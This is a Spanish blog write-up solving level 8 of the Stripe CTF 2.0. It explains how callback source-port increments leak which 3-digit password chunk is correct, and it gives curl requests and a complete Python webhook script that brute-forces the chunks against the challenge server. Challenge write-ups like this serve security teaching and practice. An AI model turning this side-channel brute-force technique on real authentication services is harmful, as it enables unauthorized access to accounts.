You can obtain the code for PasswordDB from git clone https://level08-2.stripe-ctf.com/user-veyrdiujkx/level08-code, or simply read the source below.
 

No fue rápido ver cuál era el objetivo, en este caso con el código que nos habían dado monté en local el servicio para hacer las pruebas. Cuando se realizaba una petición:
curl http://127.0.0.1 -d '{"password": "123456789012", "webhooks": []}'

se obtenía {"success": false} o {"success": true}. Añadiendo un webhook se recibía el resultado en forma de petición POST. Analizando el funcionamiento del servicio se extrae:
  1. Un servidor principal maneja una contraseña numérica de 12 dígitos que es divida en 4 trozos. Estos trozos son gestionados por servicios individuales.
  2. Cuando se envía una petición al servidor principal, este consulta, por orden y uno por uno, a los servicios individuales. Si uno de los servicios responde al servidor principal que no es correcto, este no realiza más peticiones al resto de servicios individuales y contesta con false.
Nos interesaría atacar a los servicios individuales con una fuerza bruta a 3 dígitos puesto que es más rápido que atacar al servidor con fuerza bruta de 12 dígitos, pero no se tiene acceso a estos servicios, por lo que se descarta. En las pistas iniciales indicaban que no se trataba de un ataque basado en el tiempo (timming attack) por lo que se desecha la opción. 

Decidí acudir al IRC que estaba montado para el CTF para ver que comentaba el resto de participantes sobre la prueba, y ahí obtuve una pista: tenía que revisar toda la conexión. Por lo que hice un script que mostrara los datos de la conexión: host y puerto origen, el resto de datos host-puerto destino y el mensaje ya lo conocía. Cuando lancé el script en local, pude extraer el patrón:
python ports.py 
('127.0.0.1', 38251)
('127.0.0.1', 38254)
('127.0.0.1', 38257)
('127.0.0.1', 38260)
('127.0.0.1', 38263)
('127.0.0.1', 38266)
('127.0.0.1', 38269)

Enviando diferentes contraseñas se deduce que si el primer trozo de la contraseña es erróneo, hay un salto de 3 en el número de puerto, si el primer trozo es correcto pero el segundo no, hay un salto de 4 en el número de puerto:
('127.0.0.1', 42120)
('127.0.0.1', 42124)
('127.0.0.1', 42128)
('127.0.0.1', 42132)
('127.0.0.1', 42136)
('127.0.0.1', 42140)

Así hasta que obtenemos los tres primeros trozos, para sacar el cuarto trozo y por lo tanto la contraseña, se hizo una fuerza bruta al servidor principal.
En local el patrón era bastante regular por lo que se daba la diferencia de +3, +4 o +5 en el número de puerto; sin embargo, cuando se realizó contra el servidor del nivel 8 debido a la carga de este se recibían diferencias mayores a pesar de que la contraseña fuera incorrecta por lo que en esos casos había que repetir la consulta para esa contraseña.

El código para la consulta del primer trozo es:
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
from time import sleep
import string
import httplib
import os


srv8 = "level08-2.stripe-ctf.com"
srv2 = "level02-2.stripe-ctf.com"
cont = 0 # contador de posicion
rangoVal= range(999) # rango de valores posibles 
lastPort = 0 # ultimo puerto
class Manejador(BaseHTTPRequestHandler):
        def do_POST(self):
            global srv2, cont, lastPort, rangoVal
            self.send_response(200)
            self.wfile.write("ook");

            print str(rangoVal[cont]).zfill(3) + "-000-000-000",
            print "Diferencia: " + str(self.client_address[1] - lastPort),
            if self.client_address[1] - lastPort == 3:
                        print "Password incorrecta"
                        rangoVal.remove(rangoVal[cont])
            elif len(rangoVal) == 1:
                        print "Password: " + str(rangoVal[0])
                        os._exit(1)
            else:
                        print "Diferencia erronea"

            lastPort = self.client_address[1]
            print rangoVal
            cont = cont + 1
            if cont >= len(rangoVal):
                cont = 0
            c = httplib.HTTPConnection(srv8, 443)
            passwd = str(rangoVal[cont]).zfill(3) + "000000000"
            print "Password?: " + passwd
            c.request("POST", "/user-veyrdiujkx", '{"password": "' + passwd + '", "webhooks": ["'+srv2+':43278"] }')
            sleep(0.2)
            c.close()

def main():
        try:
            srv = HTTPServer(('0.0.0.0', 43278), Manejador)
            print "WebHook:  :43278"
            srv.serve_forever()
        except KeyboardInterrupt:
            srv.socket.close()

if __name__ == '__main__':
        main()

En la descripción nos indicaban que se tenía acceso por ssh al servidor del nivel 2, por lo que se utilizó para ejecutar el código. El script queda esperando a una primera petición, por lo que mediante curl se realizó la petición:
curl https://level08-2.stripe-ctf.com/user-veyrdiujkx/ -d '{"password": "000000000000", "webhooks": ["http://level02-2.stripe-ctf.com:43278"]}'

Hay soluciones mucho más eficientes, pero dado que tenía poco tiempo busqué la forma más rápida de codificar algo que funcionara y me diese la solución. De hecho hubo hasta un nivel extra no-oficial para ver quien sacaba la password más rápido con su script.

Si os interesan otras soluciones al nivel 8, en la siguiente web hay un listado:
https://docs.google.com/spreadsheet/ccc?key=0AqPyYgZlFopxdHBYSjJyY1V3dFdUN1hvMVB5cUU0Nnc#gid=0

 
El CTF ha sido divertido, ha excepción del nivel 8 las pruebas eran fáciles de ver qué es lo que teníamos que hacer para conseguir la contraseña. La variedad de lenguajes utilizados(php ruby python) también le ha dado un toque al juego.
Para terminar, dar las gracias a Stripe por montar el reto y por la camiseta para los ganadores!

Hay bastantes y muy buenas soluciones al CTF, con otras formas de resolverlo:

http://blog.ioactive.com/2012/08/stripe-ctf-20-write-up.html
http://blog.spiderlabs.com/2012/08/stripe-ctf-walkthrough.html
http://abiusx.com/stripe-ctf-2-web-challenges/
http://blog.ericrafaloff.com/2012/08/24/my-stripe-ctf-play-by-play/
http://jasiek.posterous.com/stripe-ctf-20-walkthrough
http://me.veekun.com/blog/2012/08/29/stripe-ctf-2-dot-0/
http://sec.omar.li/2012/08/stripe-ctf-writeup.html
http://blog.feabhas.com/2012/08/capture-the-flag-2-0-the-after-party/ 
http://blog.ontoillogical.com/blog/2012/08/30/my-solutions-to-the-stripe-ctf-web-app-edition/
http://my.opera.com/devloop/blog/2012/08/30/ctf-stripe-2012-mes-solutions
http://blog.matthewdfuller.com/2012/08/stripe-capture-flag-level-by-level.html
https://github.com/lukegb/Stripe-CTF-2.0/
http://labs.excilys.com/2012/08/29/stripe-capture-the-flag-web-edition/
http://unlearningsecurity.blogspot.com.es/2012/09/stripe-capture-flag-web-edition.html
http://unlearningsecurity.blogspot.com.es/2012/09/stripe-capture-flag-web-edition_4.html
http://unlearningsecurity.blogspot.com.es/2012/09/stripe-capture-flag-web-edition_5.html


Destacar los siguientes enlaces por su forma de resolver el nivel 5 y 6, respectivamente:

http://sec.omar.li/2012/08/stripe-ctf-writeup.html
http://www.codelord.net/2012/08/30/rack-params-magic-even-got-stripe-ctf-creators/
fuente: http://www.hackplayers.com/2012/09/solucionario-del-ctf-20-de-stripe.html
Powered by Bad Robot
Helped by Blackubay